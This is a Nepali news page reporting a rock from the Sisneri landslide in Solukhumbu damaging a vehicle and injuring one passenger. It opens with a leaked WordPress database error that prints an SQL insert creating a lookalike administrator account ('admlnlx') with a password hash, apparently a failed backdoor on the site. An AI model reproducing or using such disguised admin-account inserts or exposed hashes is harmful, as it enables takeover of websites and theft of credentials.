WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BX8kqN0rRL2qEzlW86GEf2Q05c4xpb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:43:15', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुको सिस्नेरी पहिरोमा ढुङ्गा खस्दा गाडी कुच्चियो, एकजना घाइते – Gaule Khabar

सोलुखुम्बुको सिस्नेरी पहिरोमा ढुङ्गा खस्दा गाडी कुच्चियो, एकजना घाइते

सोलुखुम्बुको सिस्नेरी पहिरोमा ढुङ्गा खस्दा गाडी कुच्चियो, एकजना घाइते

गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सोलुधुदकुण्ड नगरपालिका स्थित सिस्नेरी पहिरोमा परि एउटा गाडीमा क्षति पुगेको छ ।
सोलुखुम्बुबाट काठ्माण्डौ तर्फ गई रहेको बा १७ च ६९३५ स्करपियोमा माथिबाट खसेको ढुङ्गा लागी क्षति पुगेको हो ।
सोमबार बिहान करिब साँढे ११ बजेतिर पहिरोको बिचमा पुगेको गाडीमा एक्कासी माथिबाट ढुङ्गा खसेर लागेपछि भाग्ने क्रममा एकजना सामान्य घाईते भएका छन् । जिल्ला प्रहरी कार्यालय, सोलुखुम्बुका अनुसार गाडीमा सवार ४ जना मध्ये काठ्माण्डौ निवासी ४२ बर्षिय डिबी शेर्पा घाईत भएका हुन् । पहिरोबाट खसेको ढुङ्गा लागेर गाडीको माथिल्लो भाग र साईडमा क्षति पुगेको छ । सामान्य घाईते शेर्पा सहित अन्य पुनः काठ्माण्डौ तर्फ लागेका छन् ।

सोलुखुम्बु जोड्ने एक मात्र मुख्य सडक निर्माण भएदेखि नै सोलुदुधकुण्ड नगरपालिका वडा नंं. ११ मा पर्ने सिस्नेरीमा बर्षायाममा प्रत्येक बर्ष ठुलो पहिरो जाँदै आएको छ । बर्षेणी लाखौंको क्षति प्र्‍याउदै आएको सो सडकको बिकल्पका बिषयमा छलफल भएपनि ठोस निर्णय भने भएको पाईदैन । यस बर्ष पनि अघिल्लो साता २ दिनसम्म पहिरोका कारण सवारी आवतजावत पुर्ण रुपमा ठप्प भएको थियो ।

sourse:hamropage

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका